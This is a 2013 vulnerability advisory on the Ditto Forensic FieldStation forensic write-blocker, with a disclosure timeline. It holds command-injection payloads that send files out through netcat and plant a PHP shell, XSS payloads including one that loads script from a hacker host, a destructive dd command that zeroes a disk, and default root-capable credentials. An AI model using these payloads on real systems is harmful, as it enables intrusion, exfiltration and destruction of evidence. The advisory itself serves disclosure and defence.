Ditto Forensic FieldStation 2013Oct15a XSS/ CSRF / Command Execution

`**************************************************************  
Title: Ditto Forensic FieldStation, multiple vulnerabilities  
Versions affected: <= 2013Oct15a (all)  
Vendor: CRU Wiebetech  
Discovered by: Martin Wundram  
Email: [email protected]  
Date found: 2013-04-22  
Date published: 2013-12-12  
Status: partially patched  
**************************************************************  
  
  
0] ======== Introduction / Background / Impact ========  
In computer forensics (http://en.wikipedia.org/wiki/Computer_forensics) one  
essential requirement is that evidence data does not get modified at all (or   
not unnoticed, at least). Therefore IT forensic experts use write-blockers to   
ensure a read-only access to evidence data like hard disks or USB mass   
storage.  
  
The Ditto Forensic FieldStation is such a special equipment (hardware with  
embedded software) used by forensic experts to analyse and copy evidence data   
in a safe and secure way. The ditto is explicitly marketed as a device to   
acquire data from network file shares, too. This means it is meant to be   
connected to possibly hostile networks of suspects.  
  
However it was found to be vulnerable up to the point of not being reliable as   
a computer forensic device.  
  
  
1] ======== OS Command Injection ========  
Class: Command Injection [CWE-77]  
Impact: Code execution  
Remotely Exploitable: Yes  
CVE Name: CVE-2013-6881  
CVSS v2 Base Score: 10  
Overall CVSS v2 Score: 9.2  
CVSS v2 Vector:  
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)  
  
Several input fields of the web application are vulnerable to OS command  
injection. E.g. the application allows the setting of parameters like 'sector  
size' or 'skip count' for a forensic imaging task. Because of improper  
neutralization in combination with the web server running with root   
privileges, an attacker is able to access and manipulate the complete system.  
  
Example 1 (setting of 'sector size' = 1 with malicious content):  
  
1;cat /opt/web/htdocs/index.php | nc 192.168.1.1 6666;  
  
Example 2 (setting of 'set-size' = 1 with copying a PHP shell from  
the external SD card):  
  
1;cp /ditto/shell.php /opt/web/htdocs;  
  
  
2] ======== Persistent XSS ========  
Class: Cross-site Scripting [CWE-79]  
Impact: Code execution  
Remotely Exploitable: Yes  
Status: unpatched  
CVE Name: CVE-2013-6882  
CVSS v2 Base Score: 9  
Overall CVSS v2 Score (if patched): 9.2  
CVSS v2 Vector:  
(AV:N/AC:L/Au:N/C:P/I:C/A:P/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)  
Overall CVSS v2 Score (unpatched): 10  
  
The web application suffers from multiple vulnerabilities regarding XSS. The  
first one (a) is critical because an unauthorized attacker is able to push  
malicious code into the system and consequently attacking every user. The   
other ones (b) need authentication first.  
  
a) The web application logs every login (including the username) in a not  
sanitized way to a system log. Additionally, the web application embeds that  
system log rendered as HTML into the start page of every user who successfully  
logs in. Thus an unprivileged attacker can persistently inject malicious code  
which attacks all users of the vulnerable system immediately after their   
login.  
  
Example:  
  
POSTDATA=  
user=demo%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E  
&pass=demo&login=Log+In  
  
  
b) It is easily possible to submit malicious data as input into multiple HTML  
form fields (e.g. one can force the system to load externally hosted   
JavaScript code with <script src=http://www.hacker.tld/code.js></script>).   
This can result in dangerous situations where the (external) JavaScript code   
mangles the information displayed about important computer forensic key values   
whose integrity is crucial.  
  
Example:   
784 PetaByte (PB) source disk instead of 32 GB, investigator "Al Capone",  
"verify actions: yes" instead of "no", ...  
  
  
3] ======== Cross-Site Request Forgery ========  
Class: Cross-Site Request Forgery [CWE-352]  
Impact: Application misuse  
Remotely Exploitable: Yes  
CVE Name: CVE-2013-6883  
CVSS v2 Base Score: 6.6  
Overall CVSS v2 Score: 8  
CVSS v2 Vector:  
(AV:N/AC:H/Au:N/C:P/I:C/A:P/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)  
  
The web application is vulnerable to attacks using Cross-Site Request Forgery.  
E.g. the disk erase technique (correct settings are important for the reliable  
deletion of sensitive forensic data) can be changed with a simple POST   
request.  
  
  
4] ======== Misconfigured Daemon Rights ========  
Class: Configuration [CWE-16]  
Impact: Full system access  
  
The web server lighthttpd and the PHP engine are run as user 'root'. Thus  
injection weaknesses in the 'ditto' web application result in immediate full  
system access.  
  
  
5] ======== Unneeded Daemons/Software ========  
Class: Configuration [CWE-16]  
Impact: Attackable services  
Best matching CCE-ID: CCE-4268-9  
  
Forensic usage needs only write-blocking and imaging of evidence data.   
However, the base system contains further active software and services. This   
helps attacking the system and escalating privileges. The tools/daemons are   
especially netcat and an active SSHd. Furthermore, the SSHd binds to the   
network port which is labeled as 'source' and thus intended for usage in   
supposedly hostile network environments - the network containing evidence data   
from suspects.  
  
  
6] ======== Use of standard credentials ========  
Class: Use of Hard-coded Credentials [CWE-798]  
Impact: unwanted full system access  
Remotely Exploitable: Yes  
CVE Name: CVE-2013-6884  
CVSS v2 Base Score: 10  
Overall CVSS v2 Score: 9.2  
CVSS v2 Vector:  
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)  
  
The ditto write-blocker contains a default system user named 'ditto' with the  
default password 'ditto' which is allowed to elevate its user rights to root  
(sudo) without further authentication. In combination with the active SSHd,   
this vulnerability allows attackers full access to the ditto if it gets   
connected to the same/reachable network.  
  
  
7] ======== Misconfigured Core System ========  
Class: Configuration [CWE-16]  
Impact: Alteration of evidence data  
Remotely Exploitable: Yes  
  
Although explicitly marketed as a hardware write-blocker, the ditto does not  
implement any specific write-blocking mechanism at all. The underlying system   
is able to manipulate or even erase evidence on devices which are connected to   
the 'source side' of the ditto. The problem is: no hardware-level, no driver-  
level and no kernel-level (blockdev) write-blocking are implemented. Only the   
web application prevents the user from writing to the source media. That is   
just security by obscurity. Finally, every critical weakness or simple   
malfunction in the web application can potentiallly lead to overwriting of   
source/evidence data.   
  
Furthermore, the embedded Linux system itself mounts the system partition as  
writable. Thus malware could be persistently deployed!  
  
Example:  
One can simply overwrite supposedly write-protected source data (USB stick   
and  
SATA disk) with  
dd if=/dev/zero of=/dev/sda.  
  
  
8] ======== Solution ========  
Upgrade your ditto to the newest available firmware (2013Oct15a). Don't   
connect the device to potentially hostile networks. Examine your device if it   
has been manipulated at an earlier time (has someone placed a backdoor in the   
embedded Linux, or a malware which silently manipulates evidence data or   
copies of evidence data?).  
  
  
9] ======== Report Timeline ========  
2013-04-22 Discovery of vulnerabilities  
2013-04-23 First contact with vendor including agreement about later public  
disclosure  
2013-04-26 Detailed information about vulnerabilities provided to vendor  
2013-06-30 Vendor fixes some vulnerabilities with firmware 2013Jun30a  
2013-10-15 Vendor fixes some vulnerabilities with firmware 2013Oct15a  
2013-11-26 Information with details provided to vendor about upcoming public  
disclosure. Vendor gave feedback regarding technical accuracy of  
this report  
2013-12-12 Public disclosure  
  
  
10] ======== Discussion ========  
Because integrity is of utmost importance during the forensic process (correct  
handling of evidence data and correct deduction of conclusions and  
implications), even small vulnerabilities in forensic tools and devices become  
critical.  
  
  
11] ======== References ========  
a)  
http://www.cru-inc.com/support/software-downloads/ditto-firmware-  
updates/ditto-firmware-release-notes-2013oct15a/  
b)  
http://www.cru-inc.com/support/software-downloads/ditto-firmware-  
updates/ditto-firmware-release-notes-2013jun30a/  
  
  
--   
Diplom-Wirtschaftsinformatiker Martin G. Wundram  
  
DigiTrace GmbH - Kompetenz in IT-Forensik  
Geschäftsführer: Alexander Sigel, Martin Wundram  
Registergericht Köln, HR B 72919  
USt-IdNr: DE278529699  
  
Zollstockgürtel 59, 50969 Köln  
Telefon: 0221-6 77 86 95-0  
Website: www.DigiTrace.de  
E-Mail: [email protected]  
  
  
`